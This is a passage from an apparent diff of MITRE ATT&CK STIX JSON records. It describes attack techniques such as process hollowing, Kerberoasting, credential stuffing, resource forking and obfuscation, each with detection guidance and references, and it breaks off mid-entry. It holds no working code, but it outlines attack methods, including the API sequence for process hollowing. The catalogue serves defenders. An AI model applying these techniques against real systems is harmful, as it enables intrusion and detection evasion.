"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1073", + "external_id": "T1073" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/641.html", + "external_id": "CAPEC-641" + }, + { + "source_name": "MSDN Manifests", + "description": "Microsoft. (n.d.). Manifests. Retrieved June 3, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/aa375365" + }, + { + "source_name": "Stewart 2014", + "description": "Stewart, A. (2014). DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-11T21:37:00.009Z", + "name": "Process Hollowing", + "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nProcessing hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process’ thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", + "created": "2020-01-14T17:21:54.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/012", + "external_id": "T1055.012" + }, + { + "source_name": "Nviso Spoof Command Line 2020", + "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.", + "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "Leitch Hollowing", + "description": "Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.", + "url": "http://www.autosectools.com/process-hollowing.pdf" + }, + { + "source_name": "Mandiant Endpoint Evading 2019", + "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.", + "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics", + "Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security", + "Idan Revivo, @idanr86, Team Nautilus Aqua Security", + "David Tayouri" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)\n\nHigher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Containers" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "User" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "created": "2017-05-31T21:30:55.066Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1068", + "external_id": "T1068" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + }, + { + "source_name": "Microsoft Driver Block Rules", + "description": "Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules" + }, + { + "source_name": "Unit42 AcidBox June 2020", + "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.", + "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Resource Forking", + "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jaron Bradley @jbradley89", + "Ivan Sinyakov" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Notarization", + "Gatekeeper" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb", + "created": "2021-10-12T20:02:31.866Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/009", + "external_id": "T1564.009" + }, + { + "source_name": "tau bundlore erika noerenberg 2020", + "description": "Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.", + "url": "https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html" + }, + { + "source_name": "Resource and Data Forks", + "description": "Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.", + "url": "https://flylib.com/books/en/4.395.1.192/1/" + }, + { + "source_name": "ELC Extended Attributes", + "description": "Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.", + "url": "https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/" + }, + { + "source_name": "sentinellabs resource named fork 2020", + "description": "Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.", + "url": "https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/" + }, + { + "source_name": "macOS Hierarchical File System Overview", + "description": "Tenon. (n.d.). Retrieved October 12, 2021.", + "url": "http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Account Access Removal", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Hubert Mank" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "created": "2019-10-09T18:48:31.906Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1531", + "external_id": "T1531" + }, + { + "source_name": "CarbonBlack LockerGoga 2019", + "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.", + "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" + }, + { + "source_name": "Unit42 LockerGoga 2019", + "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", + "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-07T14:28:02.910Z", + "name": "Credential Stuffing", + "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Diogo Fernandes", + "Anastasios Pingios" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "created": "2020-02-11T18:39:59.959Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1110/004", + "external_id": "T1110.004" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Kerberoasting", + "description": "Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]). (Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_system_requirements": [ + "Valid domain account or the ability to sniff traffic within a domain." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1208", + "external_id": "T1208" + }, + { + "source_name": "Microsoft Detecting Kerberoasting Feb 2018", + "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", + "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/" + }, + { + "source_name": "Microsoft SPN", + "description": "Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.", + "url": "https://msdn.microsoft.com/library/ms677949.aspx" + }, + { + "source_name": "Microsoft SetSPN", + "description": "Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.", + "url": "https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx" + }, + { + "source_name": "SANS Attacking Kerberos Nov 2014", + "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", + "url": "https://redsiege.com/kerberoast-slides" + }, + { + "source_name": "Harmj0y Kerberoast Nov 2016", + "description": "Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "source_name": "Empire InvokeKerberoast Oct 2016", + "description": "EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.", + "url": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" + }, + { + "source_name": "AdSecurity Cracking Kerberos Dec 2015", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "url": "https://adsecurity.org/?p=2293" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:27:18.945Z", + "name": "Obfuscated Files or Information", + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Red Canary", + "Christiaan Beek, @ChristiaanBeek" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \n\nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host Forensic Analysis", + "Signature-based Detection", + "Host Intrusion Prevention Systems", + "Application Control", + "Log Analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "created": "2017-05-31T21:30:32.662Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027", + "external_id": "T1027" + }, + { + "source_name": "Volexity PowerDuke November 2016", + "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", + "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + }, + { + "source_name": "GitHub Revoke-Obfuscation", + "description": "Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.", + "url": "https://github.com/danielbohannon/Revoke-Obfuscation" + }, + { + "source_name": "FireEye Obfuscation June 2017", + "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.", + "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html" + }, + { + "source_name": "FireEye Revoke-Obfuscation July 2017", + "description": "Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf" + }, + { + "source_name": "GitHub Office-Crackros Aug 2016", + "description": "Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.", + "url": "https://github.com/itsreallynick/office-crackros" + }, + { + "source_name": "Linux/Cdorked.A We Live Security Analysis", + "description": "Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.", + "url": "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/" + }, + { + "source_name": "Carbon Black Obfuscation Sept 2016", + "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.", + "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/" + }, + { + "source_name": "PaloAlto EncodedCommand March 2017", + "description": "White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T00:20:21.488Z", + "name": "Multi-Factor Authentication", + "description": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)\n\nFor example, modifying the 